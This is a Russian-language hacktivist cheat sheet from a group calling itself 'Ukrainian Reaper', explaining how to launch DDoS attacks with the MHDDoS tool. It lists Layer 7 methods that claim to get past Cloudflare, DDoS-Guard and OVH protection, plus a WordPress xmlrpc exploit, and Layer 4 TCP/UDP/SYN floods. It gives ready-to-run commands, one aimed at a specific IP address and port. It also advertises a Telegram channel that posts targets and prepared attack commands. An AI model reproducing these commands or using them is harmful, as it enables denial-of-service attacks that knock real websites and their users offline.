Глубокий разбор MHDDoS (Шпаргалка)
Украинский ЖнецПривет киберсловяне!
В предыдущем туториале мы запускали простенькую DDoS-атаку через тулзу MHDDoS, использовали команду, которую в качестве примера предложил разработчик данного средства. Запустив первую атаку, ботнет Украинского Жнеца (~15 машин) с легкостью похоронил простенькие сайты. Средство оказалось рабочим и эффективным, теперь давайте разберем полный функционал данного монстра.
Как работает?
MHDDoS предлагает проведение атаки на двух уровнях OSI (Сетевая модель):
- Layer 7 – Верхний уровень сетевой модели, атака производится на уровне приложений средством сложных/зловредных/неполных http/https-запросов. Атака производится с использованием веб-адреса(ссылки) на цель. Проводя атаки на данном уровне, есть возможность прохождения различных средств DDoS-защиты (Cloudflare, DDoS-guard, etc.), а также подключения прокси.
- Layer 4 – Транспортный уровень, прямая связь между клиентом и серверов. Атака производится отправкой TCP/UPD/SYN пакетов и запросов напрямую на внешний сервер по определенному порту. Данная атака сработает если атакуемый хост(веб-сервер) не является хостом WAF – тоесть специальный хост-бастион, предназначенный для обработки большой нагрузки и фильтрации зловредных пакетов.
Разбираем команды и средства для атаки на Layer 7
Шаблон команды выглядит следующим образом:
- python3 start.py <layer7-tool> https://example.com <socks-type> <threads> <proxylist> <rpc> <duration> <debug>
В <layer7-tool> указываем один из предложенных методов атаки:
- GET | DDoS запросами GET
- POST | DDoS запросами POST
- OVH | Атака с прохождением защиты OVH
- STRESS | Отправка http-пакетов большого веса
- DGB | Атака с прохождением защиты DDoS Guard
- APACHE | Атака на уязвимую версию apache веб-сервер
- XMLRPC | Атака с использованием вредоносного эксплойта для Wordpress-сайтов /xmlrpc.php)
- CFB | Атака с прохождением защиты CloudFlare
- CFBUAM | Атака с прохождением защиты CloudFlare Under Attack Mode
- BYPASS | Атака с прохождением защиты обычных AntiDDoS решений
<socks-type> - ставим значение «5», почитать про SOCK5 протокол можете самостоятельно
<threads> - количество потоков угроз, сколько соединений будет установлено.
<proxylist> - использованием прокси-соединений для атаки, используем значение proxy.txt (этот файл автоматически у вас загружается при загрузке MHDDoS). Если вам не нужно прокси-соединение для атак (например, используете впн или свои прокси - просто оставьте параметр пустым)
<rpc> - соединений в секунду
<duration> - длительность атаки в секундах
<debug> - мониторинг процесса атаки, если требуется указывать true
Итоговая команда с использованием метода BYPASS выглядит следующим образом:
- python3 start.py bypass https://example.com 5 1000 proxy.txt 100 360 true
Разбираем команды и средства для атаки на Layer 4
Шаблон команды выглядит следующим образом:
- python3 start.py <layer4-tool> <ip:port> <threads> <duration>
В <layer7-tool> указываем один из предложенных методов атаки:
- TCP | DDoS TCP-пакетами
- UDP | DDoS UDP-пакетами
- SYN | DDoS SYN-запросами
p.s. Средства по амплификации здесь не указаны, так как нужно знать значение broadcast-шлюза в подсети, данные атаки больше подходят для внутренней сети, учитывая то, что веб-сайты используют WAF.
ip:port – указываем IP-адрес и порт в формате 188.114.97.22:53
<threads> - количество пакетов
<duration> - продолжительность атаки в секундах
Итоговая команда с методом UDP DDoS будет выглядить так:
- python3 start.py udp 188.114.97.22:53 1000 360
Подготовил Украинский Жнец
- Наш Telegram-канал #Тут публикуем цели, подготавливаем для Вас команды для атаки и выкладываем новые гайды
- Наш Telegram-чат #Вам тут помогут включить компуктер и стать украинским жнецом, которого будут боятся все русские веб-сервисы